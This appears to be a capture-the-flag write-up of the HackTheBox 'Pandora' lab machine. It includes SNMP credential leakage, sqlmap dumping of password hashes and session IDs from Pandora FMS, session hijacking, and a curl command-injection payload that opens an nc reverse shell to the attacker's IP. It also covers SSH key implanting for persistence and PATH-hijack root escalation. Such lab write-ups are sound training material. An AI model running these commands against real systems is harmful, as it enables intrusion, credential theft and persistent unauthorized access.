Pandora HackTheBox WalkThrough
This is Pandora HackTheBox machine walkthrough. In this writeup, I have demonstrated step-by-step how I rooted
Pandora HackTheBox machine. Before starting let us know something about this machine. It is
OS box with IP address
10.10.11.136 and difficulty
easy assigned by its maker.
First of all, connect your PC with
HackTheBox VPN and make sure your connectivity with Pandora machine by pinging its IP 10.10.11.136. If all goes correct then start hacking. As usual, I started by scanning the machine.
Scanning gives us an idea how we have to proceed further. Like, it helps in
banner grabbing the services running over different ports and sometimes it helps in vulnerability assessment also. I have used
$ nmap for this task and the result is given below: –
$ sudo nmap -p- -oN full-tcp-scan.nmap --min-rate=10000 10.10.11.136
$ sudo nmap -p22,80 -oN script-scan.nmap -sC -sV 10.10.11.136
$ sudo nmap --top-ports 10 -sU -oN top-udp.nmap 10.10.11.136
$ sudo nmap -p161 -sU -sC -sV -T4 -oN udp-script.nmap 10.10.11.136
Nmap full TCP scan revealed ports
80 as open.
OpenSSH is running over port 22 and
apache2 web server is running over port 80. Also,
UDP scan on
top 10 ports revealed port
161 as open and
SNMP service is running over it. SNMP is bit unique let us explore over it.
Simple Network Management Protocol (SNMP) as an Internet Standard protocol for collecting and organizing information about managed devices on IP networks and for modifying that information to change device behavior. It is widely used in network management for network monitoring. It exposes management data in the form of variables on the managed systems organized in a Management Information Base (MIB) which describes the system status and configuration.
Enumeration on Port 161
On further enumeration on port 161 using
nmap's snmp scripts found credential
$ sudo nmap -sU -p161 --script “snmp* and not snmp-brute” 10.10.11.136
You can also use metasploit’s auxiliary module
auxiliary/scanner/snmp/snmp_enum for SNMP enumeration. It also performs the same task as nmap’s snmp scripts do.
msf6 > use auxiliary/scanner/snmp/snmp_enum
msf6 auxiliary(scanner/snmp/snmp_enum) > set RHOSTS 10.10.11.136
msf6 auxiliary(scanner/snmp/snmp_enum) > run
Let us use this [daniel: HotelBabylon23] credential to SSH into the pandora box.
Getting User Shell
$ ssh [email protected]
$ whoami && id
We have successfully logged in into
Pandora box as user
daniel. It has two users namely
matt. User flag is only accessible to matt and root user therefore, when I tried to access it, it gave me
Access Denied message. To capture the flag, we have to logged in as user matt. After some enumeration when I didn’t find anything interesting then simply checked all the listening ports on pandora box.
Checking the Listening Ports
$ ss -lnpt
80 are listening. Ports
22 are listening as normal [because they can be accessed from outside the box]. On the other hand, ports
53 are only accessible from localhost. Since we don’t have any credential so we can’t access them. I simply curled the IP 127.0.0.1 and found a URI
/pandora_console/. This hinted me to check the URL http://127.0.0.1/pandora_console/. When I checked it, I found different content which was not accessible through the URL http://10.10.11.136/pandora_console/.
$ curl 127.0.0.1
To access this
Pandora Console, we have to
port forward port number 80 to our localhost [kali machine]. Since we have SSH credentials so can use it to perform local port forwarding.
Local Port Forwarding
$ ssh -L 80:127.0.0.1:80 [email protected]
After localport forwarding
pandora_console is accessible through the URL http://127.0.0.1/pandora_console/.
Tried to login with
Pandora FMS default credential
pandora and with some other combination of credentials but none of them worked. There is also the version of this FMS is present viz.,
Simply googled this version for vulnerabilities and found it is affected with many vulnerabilities namely
Malicious File Execution,
XSS and a lot more. Check articles this & this for more info.
SQL Injection can be confirmed by the endpoint http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=1\.
Soon I got this vulnerability I dumped the
Password of all the users.
$ sqlmap -u http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=1 --dbs --batch --technique=EU --time-sec=30
$ sqlmap -u http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=1 -D pandora -T tusuario -C fullname,is_admin,password,email --dump --thread=10
Then tried to crack the hash using
$ hashcat and wordlist
rockyou.txt but it could not crack them. Then I dumped the
session IDs of all the logged in user from the table
tsessions_php and hijacked the session of user
$ sqlmap -u http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=1 -D pandora --dbms=mysql -T tsessions_php --dump --thread=10 --risk=3
Hijacking Session of Matt
Simply replace the
PHPSESSID value with
g80h3hf7j4u3js38pchlm445kn and then refresh the page. We can see we have successfully hijacked the session of matt and logged in successfully as matt.
Getting Shell as Matt
According to this post we can perform
Remote Command Execution via the
Note: If we are getting user shell here then it will be of the privilege of the user matt because currently, we are logged in as matt.
Let us exploit and get user shell using the PoC given in this post.
On Kali Machine
$ curl -H "Cookie: PHPSESSID=g80h3hf7j4u3js38pchlm445kn" "http://127.0.0.1/pandora_console/ajax.php?page=include/ajax/events&perform_event_response=10000000&target=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|sh+-i+2%3E%261|nc+10.10.17.97+1234+%3E/tmp/f&response_id=1"
On Local Machine
$ nc -nvlp 1234
$ whoami && id
We have successfully got user shell with the privilege of user matt. Let us upgrade it to fully qualified Linux shell so that we can run more advanced Linux command through it.
Note: You will get access denied message as below if Session ID of matt user is expired. So, try to dump fresh session id from tsessions_php table and then use it to hijack matt’s session.
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
$ ^Z # Ctrl+Z to background the shell
$ stty raw -echo
$ fg # Plus press 2 times enter to foreground the shell
$ export TERM=xterm
We have successfully upgraded the shell. Let us capture user flag.
Capture User Flag
$ cat /home/matt/user.txt
To escalate the privilege to root we have to first find a
Privilege Escalation Vector using which we can perform privilege escalation. We can find
PrivEsc Vector either manually or using some
post exploitation enumeration scripts like Linpeas.sh, LinEnum.sh and there are a lot more. Check this link on PayloadsAllTheThings. This time, I have used Linpeas.sh for this task.
Finding PrivEsc Vector
Linpeas.sh found a custom
pandora_backup in the directory
/usr/bin/. SUID binary is that file which when executed by normal user is executed by the permission of its owner even if it is not owned by the normal user.
For example, if any binary has given a SUID permission and that file is owned by root user so, when normal user executes that binary all the commands inside that file will be executed by root privilege.
Let us check who can execute
pandora_backup by checking its permission.
$ ls -la /usr/bin/pandora_backup
pandora_backup has executable permission given to user matt. This binary can be used to escalate privilege by
Path Hijacking if the Linux commands used inside this binary is not used with their absolute path. Let us check whether any Linux command is being used without its absolute path inside
$ cat /usr/bin/pandora_backup
We found that
$ tar command is used without its absolute path. We can use
$ tar command to exploit this vulnerability and get root shell. When I tried to get shell by manipulating
$ tar command I got root shell without much effort. So here our potential
PrivEsc Vector is
Privilege Escalation by Path Hijacking or
Privilege Escalation by Custom SUID exploitation. Check HTB boxes with similar privilege escalation vector here and here.
Before privilege escalation we need to first get a
persistent shell using SSH, only then our exploit will work. I don’t know why but when I was trying to get root using this current shell I got failed every time. This exploit worked only when I got a SSH shell of user
matt by implanting my
SSH public key in
authorized_keys file of user matt. So let us implant our SSH public key into
Implanting SSH Keys
On Kali Machine
$ ssh-keygen # generate new ssh key pair
$ cat id_rsa.pub
id_rsa.pub keys in your clipboard and then paste it into authorized_keys file of user matt. If authorized_keys find not present then create one as below.
On Pandora Machine
$ mkdir .ssh
$ cd .ssh/
$ echo "Your SSH public key here" >authorized_keys
$ cat authorized_keys
Getting Shell as Matt
$ chmod 400 id_rsa
$ ssh -i id_rsa [email protected]
$ whoami && id
We have successfully got a persistence shell of user matt. Let us get root shell by performing privilege escalation.
Getting Root Shell
To get root shell do the following.
$ cd /tmp
$ echo "/bin/bash" > tar
$ export PATH=$(pwd):$PATH
$ chmod +x tar
# whoami && id
We have successfully got root shell. let us capture root flag.
Capture Root Flag
# cat /root/root.txt
This was how I rooted to Pandora HackTheBox machine. Learnt a lot during this walkthrough. Hope you have also learnt some new things. Thanks for reading this writeup. Share your experience in the comment section. Want to give any suggestion about the writeup feel free to write us at [email protected]. Check out my latest articles at https://ethicalhacs.com/.